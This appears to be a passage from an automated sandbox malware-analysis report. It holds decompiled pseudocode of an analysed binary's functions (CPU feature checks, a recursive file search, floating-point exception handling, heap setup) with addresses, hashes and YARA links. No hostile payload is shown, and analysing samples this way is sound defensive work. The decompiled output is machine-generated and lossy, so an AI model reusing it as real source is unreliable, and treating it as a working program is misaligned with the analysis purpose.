					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x2737d8 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x273010 =  *0x273010 | 0x00000004;
						 *0x2737d4 = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x273010; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x2737d4 = 3;
								 *0x273010 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x2737d4 = 5;
									 *0x273010 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x2737d8; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x2737d8 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























        0x0026280b
        0x0026280e
        0x0026281c
        0x0026282b
        0x002629a8
        0x002629ae
        0x002629ae
        0x00262831
        0x00262837
        0x00262842
        0x00262848
        0x0026284b
        0x0026284c
        0x00262850
        0x00262851
        0x00262853
        0x00262856
        0x0026285b
        0x00262864
        0x00262875
        0x00262880
        0x00262886
        0x00262887
        0x0026288f
        0x00262895
        0x00262897
        0x0026289a
        0x0026289d
        0x002628a0
        0x002628e5
        0x002628e5
        0x002628eb
        0x002628f2
        0x002628f5
        0x002628f8
        0x002628fb
        0x002628fe
        0x00262902
        0x00262905
        0x00262906
        0x0026290b
        0x0026290e
        0x00262910
        0x00262913
        0x00262916
        0x00262919
        0x00262921
        0x00262924
        0x00262927
        0x0026292c
        0x0026292c
        0x00262927
        0x00262939
        0x0026293b
        0x00262942
        0x00262951
        0x0026295c
        0x0026295f
        0x00262962
        0x00262973
        0x00262979
        0x0026297e
        0x00262981
        0x0026298f
        0x00262994
        0x00262999
        0x002629a3
        0x002629a3
        0x00262994
        0x00262973
        0x00262951
        0x00000000
        0x00262939
        0x002628a5
        0x002628af
        0x002628d4
        0x002628da
        0x002628dd
        0x00000000
        0x00000000
        0x00000000
        0x00000000

        APIs
        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00262824
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: FeaturePresentProcessor
        • String ID:
        • API String ID: 2325560087-3916222277
        • Opcode ID: 90e8a02e6d7f70ec969d27dfe0e090fd3ab49bb4fab0af06b4d8e63d2b3c8b5c
        • Instruction ID: 26dfdf7fb9347cbefc58f9ab96201d2552d7c7ef49ae76d6e73846e41c91d965
        • Opcode Fuzzy Hash: 90e8a02e6d7f70ec969d27dfe0e090fd3ab49bb4fab0af06b4d8e63d2b3c8b5c
        • Instruction Fuzzy Hash: BE518FB1E21605DFDB18CF69E98579EBBF4FB48310F24846AD408E7290D3749A94DFA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002651DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
        Download Yara Rule
        C-Code - Quality: 72%
        			E002651DA(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E0026479B(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0026874B(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E00265419(_a16, _t101, __eflags, _t111);
							E00264676(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0026874B(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00264F73();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x273018; // 0x16a19189
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E002687A0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00262CE0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E002651DA(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00268300(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00265032);
									}
								} else {
									_push(_t55);
									_t57 = E002651DA(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E002651DA(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E002629BB(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































        0x002651df
        0x002651e0
        0x002651e3
        0x002651e3
        0x002651e6
        0x002651e6
        0x002651e8
        0x002651e9
        0x002651f2
        0x002651f3
        0x002651f6
        0x002651f9
        0x002651fe
        0x00265205
        0x00265206
        0x00265207
        0x0026520a
        0x00265214
        0x00265217
        0x00265218
        0x0026521a
        0x0026522e
        0x0026522e
        0x00265231
        0x0026523b
        0x00265240
        0x00265243
        0x00265245
        0x00000000
        0x00265247
        0x0026524b
        0x00265254
        0x0026525a
        0x00000000
        0x0026525d
        0x0026521c
        0x0026521c
        0x00265222
        0x00265227
        0x0026522a
        0x0026522c
        0x00265263
        0x00265265
        0x00265266
        0x00265267
        0x00265268
        0x00265269
        0x0026526a
        0x0026526f
        0x00265273
        0x00265275
        0x0026527b
        0x00265282
        0x00265285
        0x00265288
        0x00265289
        0x0026528c
        0x0026528d
        0x00265290
        0x00265291
        0x002652b2
        0x002652b2
        0x002652b4
        0x00000000
        0x00000000
        0x00265299
        0x0026529b
        0x0026529d
        0x0026529f
        0x002652a1
        0x002652a3
        0x002652a5
        0x002652b0
        0x00000000
        0x002652b0
        0x002652a5
        0x002652a1
        0x00000000
        0x0026529d
        0x002652b6
        0x002652b8
        0x002652bb
        0x002652d4
        0x002652d4
        0x002652d6
        0x002652d9
        0x002652e9
        0x002652eb
        0x002652eb
        0x002652db
        0x002652db
        0x002652de
        0x00000000
        0x002652e0
        0x002652e0
        0x002652e3
        0x00000000
        0x002652e5
        0x002652e5
        0x002652e5
        0x002652e3
        0x002652de
        0x002652f1
        0x002652f9
        0x002652fd
        0x0026530b
        0x00265310
        0x00265325
        0x00265327
        0x0026532d
        0x00265330
        0x00265362
        0x00265362
        0x00265364
        0x00265367
        0x0026536d
        0x0026536d
        0x00265374
        0x0026538e
        0x0026538e
        0x0026539d
        0x002653a2
        0x002653a5
        0x002653a7
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00265376
        0x00265376
        0x0026537c
        0x0026537e
        0x00000000
        0x00265380
        0x00265380
        0x00265383
        0x00000000
        0x00265385
        0x00265385
        0x0026538c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0026538c
        0x00265383
        0x0026537e
        0x00000000
        0x002653a9
        0x002653b1
        0x002653b7
        0x002653b9
        0x002653b9
        0x002653c1
        0x002653c6
        0x002653ce
        0x002653d1
        0x002653d3
        0x002653e7
        0x002653ec
        0x00265332
        0x00265332
        0x00265336
        0x0026533e
        0x0026533e
        0x0026533e
        0x00265340
        0x00265343
        0x00265346
        0x00265346
        0x002652bd
        0x002652c0
        0x002652c2
        0x00000000
        0x002652c4
        0x002652c4
        0x002652ca
        0x002652cf
        0x002652c2
        0x00265353
        0x0026535e
        0x00000000
        0x00000000
        0x00000000
        0x0026522c
        0x00265200
        0x00265202
        0x0026525e
        0x00265262
        0x00265262
        0x00000000

        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID: .
        • API String ID: 0-248832578
        • Opcode ID: 550bafeb7440cff57771b5d706f9a765665c92614d2adfba0dbba864e1a56aa0
        • Instruction ID: c4935911f62bdb3441139061be7f85624e7e0422526978d444e1dcc2527d4dd9
        • Opcode Fuzzy Hash: 550bafeb7440cff57771b5d706f9a765665c92614d2adfba0dbba864e1a56aa0
        • Instruction Fuzzy Hash: 0A313A7191061AAFCB24DE78CC88EFA7BBDEF45314F140198F859D7251E6709D948B90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0026B735 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
        Download Yara Rule
        C-Code - Quality: 100%
        			E0026B735(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00269026(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00268F8C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























        0x0026b743
        0x0026b74a
        0x0026b74f
        0x0026b755
        0x0026b758
        0x0026b75e
        0x0026b763
        0x0026b768
        0x0026b768
        0x0026b76e
        0x0026b773
        0x0026b778
        0x0026b778
        0x0026b77f
        0x0026b784
        0x0026b789
        0x0026b789
        0x0026b790
        0x0026b795
        0x0026b79a
        0x0026b79a
        0x0026b7a1
        0x0026b7a6
        0x0026b7ab
        0x0026b7ab
        0x0026b7b3
        0x0026b7c3
        0x0026b7d5
        0x0026b7e7
        0x0026b7fa
        0x0026b80c
        0x0026b814
        0x0026b819
        0x0026b81e
        0x0026b81e
        0x0026b825
        0x0026b82a
        0x0026b82a
        0x0026b831
        0x0026b836
        0x0026b836
        0x0026b83d
        0x0026b842
        0x0026b842
        0x0026b849
        0x0026b84e
        0x0026b84e
        0x0026b858
        0x0026b85a
        0x0026b894
        0x0026b85c
        0x0026b861
        0x0026b885
        0x0026b88d
        0x0026b881
        0x0026b881
        0x0026b897
        0x0026b89e
        0x0026b8a0
        0x0026b8c2
        0x0026b8ca
        0x0026b8cd
        0x0026b8cd
        0x0026b8cf
        0x0026b8cf
        0x0026b8da
        0x0026b8e0
        0x0026b8e5
        0x0026b8ec
        0x0026b926
        0x0026b931
        0x0026b937
        0x0026b93a
        0x0026b93d
        0x0026b949
        0x0026b951
        0x0026b8ee
        0x0026b8f1
        0x0026b8fd
        0x0026b903
        0x0026b909
        0x0026b90c
        0x0026b915
        0x0026b915
        0x0026b954
        0x0026b962
        0x0026b968
        0x0026b96f
        0x0026b971
        0x0026b971
        0x0026b978
        0x0026b97a
        0x0026b97a
        0x0026b981
        0x0026b983
        0x0026b983
        0x0026b98a
        0x0026b98c
        0x0026b98c
        0x0026b993
        0x0026b995
        0x0026b995
        0x0026b9a2
        0x0026b9a5
        0x0026b9dc
        0x0026b9a7
        0x0026b9a7
        0x0026b9aa
        0x0026b9d5
        0x0026b9ca
        0x0026b9ca
        0x0026b9de
        0x0026b9e6
        0x0026b9e9
        0x0026ba08
        0x0026ba0d
        0x0026ba0d
        0x0026ba0f
        0x0026ba14
        0x0026ba20
        0x0026ba16
        0x0026ba19
        0x0026ba19
        0x0026ba25
        0x0026ba25
        0x0026b9eb
        0x0026b9ee
        0x0026b9fd
        0x00000000
        0x0026b9fd
        0x0026b9f0
        0x0026b9f3
        0x0026b9f5
        0x0026b9f5
        0x00000000
        0x0026b9f3
        0x0026b9ac
        0x0026b9af
        0x0026b9c5
        0x00000000
        0x0026b9c5
        0x0026b9b4
        0x0026b9b6
        0x0026b9b6
        0x0026b9b4
        0x00000000
        0x0026b9a5
        0x0026b8a7
        0x0026b8b5
        0x0026b8bd
        0x00000000
        0x0026b8bd
        0x0026b8ab
        0x0026b8b0
        0x0026b8b0
        0x00000000
        0x0026b8ab
        0x0026b868
        0x0026b876
        0x0026b87e
        0x00000000
        0x0026b87e
        0x0026b86c
        0x0026b871
        0x0026b871
        0x0026b86c

        APIs
        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0026B730,?,?,00000008,?,?,0026B3D0,00000000), ref: 0026B962
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ExceptionRaise
        • String ID:
        • API String ID: 3997070919-0
        • Opcode ID: 00a5052d3ccc7e1a3f276b5cc73a54603234640315d3b503fff9fb7d8ee9ed12
        • Instruction ID: dd371f74595c6280f4fd8e19717cb49b7e2738abf764d04a4ac2c5f5eaa72a6a
        • Opcode Fuzzy Hash: 00a5052d3ccc7e1a3f276b5cc73a54603234640315d3b503fff9fb7d8ee9ed12
        • Instruction Fuzzy Hash: 9BB13C31620609DFDB16CF28C48AB657BE0FF45365F298658E999CF2A1C335E9E1CB40
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00267394 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00267394() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x274170 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




        0x00267394
        0x0026739c
        0x002673a4

        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: HeapProcess
        • String ID:
        • API String ID: 54951025-0
        • Opcode ID: 853cb6cf9af2aa9ffd44843e043c1cfecde058b87429f58ab31b870cb88ce46e
        • Instruction ID: 611b545593b3d2e4edff44d2a8de3b9403aebcbf3b24379336f62b9675d7cf94
        • Opcode Fuzzy Hash: 853cb6cf9af2aa9ffd44843e043c1cfecde058b87429f58ab31b870cb88ce46e
        • Instruction Fuzzy Hash: F3A01130A02202CB8300AF32BE0CB083AA8BA08280B808028E008C0220EB3080828A00
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00D04515 Relevance: .1, Instructions: 92COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
        • Instruction ID: fa9b1bb3b7addc612f684838101b2d2085241f349b7c115856b2d1a71459c6e6
        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
        • Instruction Fuzzy Hash: 0541B571D1051CEBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00D04405 Relevance: .0, Instructions: 35COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
        • Instruction ID: 68a42f234c4d5b7c8d00bb974057f570423e623d65decc3924a2b87886151272
        • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
        • Instruction Fuzzy Hash: 6A0180B8A01109EFCB44DF98C590EAEF7B5FB48310B208599E919A7341D730EE51DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00D043A5 Relevance: .0, Instructions: 35COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
        • Instruction ID: 4d3f7e9a8cab99d15ba8e95a15caecfad213766a8de30c8b41d00eb45b6f0992
        • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
        • Instruction Fuzzy Hash: 1B019278A01109EFCB44DF98C590EAEF7B6FF48310F208599E919A7341D730AE41DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00D04135 Relevance: .0, Instructions: 27COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
